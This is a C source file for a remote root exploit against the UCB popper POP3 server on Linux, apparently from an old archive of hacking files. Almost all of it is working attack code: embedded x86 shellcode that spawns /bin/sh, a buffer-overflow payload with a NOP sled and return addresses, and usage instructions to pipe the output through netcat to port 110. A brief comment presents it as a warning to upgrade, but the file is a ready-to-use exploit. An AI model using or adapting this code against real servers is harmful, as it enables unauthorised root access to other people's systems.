home *** CD-ROM | disk | FTP | other *** search
- /*
- * Remote root exploit for UCB popper on Linux
- *
- * sk8@lucid-solutions.com
- * http://www.lucid-solutions.com
- *
- * Usage: ( ./linux-ucb 0 ; cat ) | nc your.host.com 110
- * Try adjusting offsets by 100.
- *
- * Tested on UCB Pop server (version 1.831beta)
- *
- * I figure it's safe to release this since UCB is not that
- * common anymore. But if you are still running it on your
- * system(s), you had better upgrade. This program shows you
- * why.
- *
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <sys/errno.h>
-
- /* Linux x86 shellcode */
- char *shell=
- "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
- "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
- "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
- "\xff\xff/bin/sh";
-
-
- #define ADDR 0xbffff1d8
- #define OFFSET 0
- #define BUFLEN 1100
-
- char buffer[BUFLEN];
- int offset=OFFSET;
-
-
- int main (int argc, char *argv[])
- {
- int i;
-
- if(argc > 2)
- {
- printf("Usage: %s [offset]\n",argv[0]);
- exit(0);
- }
- if(argc==2)
- offset=atoi(argv[1]);
-
- /* Set up the buffer */
- memset(buffer,0x90,BUFLEN);
- memcpy(buffer+BUFLEN-200-strlen(shell),shell,strlen(shell));
- for(i=BUFLEN-200+1;i<BUFLEN-4;i+=4)
- *(int *)&buffer[i]=ADDR-BUFLEN+100+offset;
- buffer[BUFLEN-1]='\n';
-
- printf("%s\n", buffer);
- }
- /* www.hack.co.za [2000]*/
